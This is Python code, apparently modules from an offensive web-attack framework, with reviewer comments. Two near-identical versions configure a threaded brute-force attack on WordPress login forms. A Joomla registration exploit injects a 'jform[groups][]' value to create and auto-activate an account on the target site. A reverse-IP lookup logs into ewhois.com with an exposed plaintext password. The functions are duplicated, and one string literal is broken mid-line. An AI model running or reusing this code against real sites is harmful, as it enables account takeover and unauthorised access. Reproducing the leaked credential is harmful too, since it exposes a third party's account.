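def run(self, frmwk, args):
    """Configure and run the generic ``attack/web_bruter`` module against a WordPress login form.

    Each attempt the delegated module makes is a POST to ``URL`` built from
    the ``DATA`` template below
    (``log=<user>&pwd=<pass>&wp-submit=Log+In&redirect_to=<URL>&testcookie=1``);
    an attempt is judged by ``CHECKTYPE`` ``'successstr'`` against the
    ``TOKEN`` marker ``'no-unread-messages'``.  That request shape is the
    observable signature of this module in web-server logs.

    Args:
        frmwk: framework instance; ``print_status``, ``modules`` and
            ``reload_module`` are used.
        args: unused, kept for the module interface.

    Returns:
        None.  ``reload_module`` is called afterwards, presumably so the
        option values set here do not persist into later runs — confirm.
    """
    module_name = 'attack/web_bruter'
    frmwk.print_status('Init params!')  # was 'paprams'
    victim = HTTP(self.options['URL'], timeout=self.advanced_options['TIMEOUT'])
    victim.storecookie = True
    # Result classification handed to the bruter: look for a marker string.
    checktype = 'successstr'
    tokenstr = 'no-unread-messages'
    # __USER__ / __PASS__ are placeholders the bruter module substitutes per attempt.
    param = (
        'log=__USER__&pwd=__PASS__&wp-submit=Log+In&redirect_to='
        + quote_plus(self.options['URL'])
        + '&testcookie=1'
    )
    frmwk.print_status('Start bruteforcer!')
    bruter = frmwk.modules[module_name]
    bruter.options.addString('URL', 'Link login', default=self.options['URL'])
    bruter.options.addString('USERNAME', 'Account login', default=self.options['USERNAME'])
    bruter.options.addString('PASSWORD', 'Password login', default=self.options['PASSWORD'])
    bruter.options.addString('DATA', 'Data sent with POST method', default=param)
    bruter.options.addString('CHECKTYPE', 'Type of checker success login', default=checktype)
    bruter.options.addString('TOKEN', 'Marker string checked by CHECKTYPE', default=tokenstr)
    bruter.options.addInteger('THREADS', 'Number of threads', default=self.options['THREADS'])
    # The two list descriptions were swapped in the original.
    bruter.options.addPath('USERLIST', 'usernames to test', default=self.options['USERLIST'])
    bruter.options.addPath('PASSLIST', 'passwords to test', default=self.options['PASSLIST'])
    bruter.options.addBoolean('VERBOSE', 'Verbose', default=self.options['VERBOSE'])
    # No request has been issued on ``victim`` yet, so unless HTTP() seeds the
    # header at construction this defaults to None.  .get() avoids a KeyError
    # when the header is absent (assumes ``headers`` is dict-like — confirm in HTTP).
    bruter.advanced_options.addString('COOKIE', 'Cookie', default=victim.headers.get('Cookie') or None)
    bruter.advanced_options.addInteger('DELAY', 'Delay time', default=self.advanced_options['DELAY'])
    bruter.advanced_options.addInteger('TIMEOUT', 'Time out request', default=self.advanced_options['TIMEOUT'])
    bruter.advanced_options.addBoolean('STOP', 'Stop scanning', default=True)
    bruter.run(frmwk, None)
    frmwk.reload_module(module_name)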
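def run(self, frmwk, args):
    """Hand a WordPress login form to the generic ``attack/web_bruter`` module.

    The delegated module POSTs the ``DATA`` template
    (``log=<user>&pwd=<pass>&wp-submit=Log+In&redirect_to=<URL>&testcookie=1``)
    to ``URL`` once per attempt and classifies the response with
    ``CHECKTYPE`` ``'successstr'`` using the ``TOKEN`` marker
    ``'no-unread-messages'``.  The repeated POST with that field set is what
    this module looks like from the server side.

    Args:
        frmwk: framework instance providing ``print_status``, ``modules``
            and ``reload_module``.
        args: unused; part of the module interface.

    Returns:
        None.  The module is reloaded at the end, presumably to reset the
        options configured here — confirm.
    """
    module_name = 'attack/web_bruter'
    frmwk.print_status('Init params!')  # typo 'paprams' fixed
    victim = HTTP(self.options['URL'], timeout=self.advanced_options['TIMEOUT'])
    victim.storecookie = True
    # How the bruter decides an attempt worked: marker string in the body.
    checktype = 'successstr'
    tokenstr = 'no-unread-messages'
    # __USER__ / __PASS__ are substituted per attempt by the bruter module.
    target_url = quote_plus(self.options['URL'])
    param = 'log=__USER__&pwd=__PASS__&wp-submit=Log+In&redirect_to=' + target_url + '&testcookie=1'
    frmwk.print_status('Start bruteforcer!')
    bruter = frmwk.modules[module_name]
    opts = bruter.options
    opts.addString('URL', 'Link login', default=self.options['URL'])
    opts.addString('USERNAME', 'Account login', default=self.options['USERNAME'])
    opts.addString('PASSWORD', 'Password login', default=self.options['PASSWORD'])
    opts.addString('DATA', 'Data sent with POST method', default=param)
    opts.addString('CHECKTYPE', 'Type of checker success login', default=checktype)
    opts.addString('TOKEN', 'Marker string checked by CHECKTYPE', default=tokenstr)
    opts.addInteger('THREADS', 'Number of threads', default=self.options['THREADS'])
    # USERLIST/PASSLIST descriptions were swapped in the original.
    opts.addPath('USERLIST', 'usernames to test', default=self.options['USERLIST'])
    opts.addPath('PASSLIST', 'passwords to test', default=self.options['PASSLIST'])
    opts.addBoolean('VERBOSE', 'Verbose', default=self.options['VERBOSE'])
    adv = bruter.advanced_options
    # ``victim`` has not sent any request yet, so this is None unless HTTP()
    # seeds the header at construction; .get() avoids a KeyError on a missing
    # header (assumes ``headers`` is dict-like — confirm in HTTP).
    adv.addString('COOKIE', 'Cookie', default=victim.headers.get('Cookie') or None)
    adv.addInteger('DELAY', 'Delay time', default=self.advanced_options['DELAY'])
    adv.addInteger('TIMEOUT', 'Time out request', default=self.advanced_options['TIMEOUT'])
    adv.addBoolean('STOP', 'Stop scanning', default=True)
    bruter.run(frmwk, None)
    frmwk.reload_module(module_name)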
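def eWhois(self, searcher):
    """Collect domains listed for ``self.ip`` by ewhois.com's reverse-IP export.

    Logs in with the credentials embedded below, fetches the export page for
    the IP, extracts the first quoted field of every matching row and appends
    those values to ``self.domains``; a one-line count is printed through
    ``self.frmwk``.

    Args:
        searcher: mapping with a ``'SITE'`` key, used only for the status line.

    Returns:
        None; results accumulate in ``self.domains``.
    """
    # NOTE(review): account credentials are hard-coded in source (the e-mail
    # is redacted, the password is not).  They belong in the framework
    # configuration, not in a module body.
    params = urlencode({
        '_method': 'POST',
        'data[User][email]': '*****@*****.**',
        'data[User][password]': 'RitX:::R1tX',
        'data[User][remember_me]': '0',
    })
    req = HTTP("http://www.ewhois.com/")
    req.storecookie = True  # the login session cookie must be replayed on the export request
    req.rand_useragent = False
    # The login response body is never used; only the stored cookie matters.
    req.Request('http://www.ewhois.com/login/', 'POST', params)
    data = req.Request("http://www.ewhois.com/export/ip-address/%s/" % self.ip)
    # NOTE(review): the '|' in this pattern is a top-level alternation (the
    # class closes at the first ']'), so any ']",""' occurrence matches the
    # right-hand branch and yields '' from findall — confirm against a real
    # export before tightening the pattern.
    urls = findall(r'"(.*?)","","","[UA\-[0-9]+\-[0-9]+|]",""', data)
    self.frmwk.print_status(self.fmt_string.format(searcher['SITE'], len(urls)))
    self.domains += urls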
def run(self, frmwk, args):
    """Register an account on a Joomla ``com_users`` registration endpoint and try to activate it by mail.

    Flow as written: fetch ``URL`` to pick up the 32-character hidden form
    token, send a fixed ``exploit`` registration POST, then a second POST
    (``registry``) carrying the generated username/password and the
    configured e-mail, report the page's warning/message block, wait 30 s,
    and look for an activation link in the mailbox read by ``self.getMail()``.
    Both POSTs include a ``jform[groups][]`` field next to
    ``task=registration.register``; that field in a registration request is
    the observable indicator of this activity.

    Args:
        frmwk: framework instance used for ``print_status`` /
            ``print_error`` / ``print_success``.
        args: unused, kept for the module interface.

    Returns:
        None.  Sets ``self.username`` and ``self.password`` as side effects.
    """
    url = self.options['URL']
    # First element of the configured mail account; presumably the mailbox
    # address that self.getMail() reads later — confirm.
    email = CONFIG.GMAIL_ACCOUNT[0]
    # Generated per run: fixed prefix plus a random integer in [1000, 100000].
    self.username = '******' + str(randint(1000,100000))
    self.password = '******'
    victim = HTTP(url)
    victim.storecookie = True  # keep the session across the requests below
    # Fixed registration payload sent once before the real one.
    exploit = 'jform%5Bname%5D=exploit&jform%5Busername%5D=exploit&jform%5Bpassword1%5D=123123&jform%5Bpassword2%5D=1231233&jform%5Bemail1%5D=pentest%40yahoo.com&jform%5Bemail2%5D=pentest%40yahoo.com&option=com_users&task=registration.register&jform%5Bgroups%5D%5B%5D=7&'
    # Same field layout with the generated username/password and the mail address.
    registry = 'jform%5Bname%5D={0}&jform%5Busername%5D={0}&jform%5Bpassword1%5D={1}&jform%5Bpassword2%5D={1}&jform%5Bemail1%5D={2}&jform%5Bemail2%5D={2}&option=com_users&task=registration.register&jform%5Bgroups%5D%5B%5D=7&'.format(self.username, self.password, email)
    frmwk.print_status('Init token')
    data = victim.Request(url)
    # The form token is a hidden input whose *name* is 32 alphanumerics and
    # whose value is "1".  NOTE(review): '\s' in a non-raw string is an invalid
    # escape (SyntaxWarning on recent Pythons); these patterns should be raw strings.
    token = search('name="([a-zA-Z0-9]{32})"\svalue="1"', data)
    if token:
        token = token.group(1)
    else:
        token = ''  # no token found: the POSTs below end with a bare '=1'
    frmwk.print_status('Send false request')
    url = url + '?task=registration.register'
    victim.Request(url, 'POST', exploit + token + '=1')
    frmwk.print_status('Send exploit request')
    data = victim.Request(url, 'POST', registry + token + '=1')
    # Joomla renders feedback in <dd class="warning message"> / <dd class="message message">.
    warning = search('class="warning\smessage">(.*?)</dd>', data, DOTALL)
    message = search('class="message\smessage">(.*?)</dd>', data, DOTALL)
    if warning:
        frmwk.print_error('Error during exploit : ' + warning.group(1))
        return
    elif message:
        frmwk.print_success('Successful : ' + message.group(1).strip())
        frmwk.print_success('Account login: %s | %s' % (self.username, self.password))
    else:
        # Mojibake of Vietnamese "Hên xui!" — roughly "hit or miss": neither
        # a warning nor a message block was found.
        frmwk.print_status('HĂȘn xui !')
    # Fixed wait for the activation mail; not configurable.
    frmwk.print_status('Sleep 30s for mail receiver !')
    sleep(30)
    # NOTE(review): the loop variable shadows the ``email`` address bound above.
    for email in self.getMail():
        active = search('(http(.*?)activate&token=(.*?))\s', email['body'], DOTALL)
        if active:
            active_link = active.group(1)
            frmwk.print_status('Active link: ' + active_link)
            break
    # NOTE(review): ``active_link`` is only bound inside the loop; if no mail
    # matched (or the mailbox was empty) this line raises NameError.  The
    # variable should be initialised to None before the loop.
    if active_link:
        data = victim.Request(active_link)
        message = search('class="message\smessage">(.*?)</dd>', data, DOTALL)
        if message:
            # NOTE(review): this string literal is split across two physical
            # lines in the file as received, which is not valid Python; the
            # intended text cannot be recovered from here.
            frmwk.print_success('Actived 
Account: %s | %s' % (self.username, self.password))
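def eWhois(self, searcher):
    """Gather domains that ewhois.com's reverse-IP export lists for ``self.ip``.

    Performs the site login with the credentials embedded below, downloads
    the export page for the IP, pulls the first quoted field of each matching
    row into ``self.domains`` and prints a one-line count via ``self.frmwk``.

    Args:
        searcher: mapping whose ``'SITE'`` entry is used in the status line.

    Returns:
        None; ``self.domains`` is extended in place.
    """
    # NOTE(review): hard-coded account credentials (the e-mail is redacted,
    # the password is not) — these should come from the framework config.
    login_form = {
        '_method': 'POST',
        'data[User][email]': '*****@*****.**',
        'data[User][password]': 'RitX:::R1tX',
        'data[User][remember_me]': '0',
    }
    params = urlencode(login_form)
    req = HTTP("http://www.ewhois.com/")
    req.storecookie = True  # replay the login session cookie on the export request
    req.rand_useragent = False
    # Login body is discarded; only the cookie it sets is needed.
    req.Request('http://www.ewhois.com/login/', 'POST', params)
    export_url = "http://www.ewhois.com/export/ip-address/%s/" % self.ip
    data = req.Request(export_url)
    # NOTE(review): the '|' here is a top-level alternation because the
    # character class ends at the first ']'; rows matching only the ']",""'
    # tail produce '' entries from findall.  Verify against a real export
    # before changing the pattern.
    urls = findall(r'"(.*?)","","","[UA\-[0-9]+\-[0-9]+|]",""', data)
    self.frmwk.print_status(self.fmt_string.format(searcher['SITE'], len(urls)))
    self.domains += urls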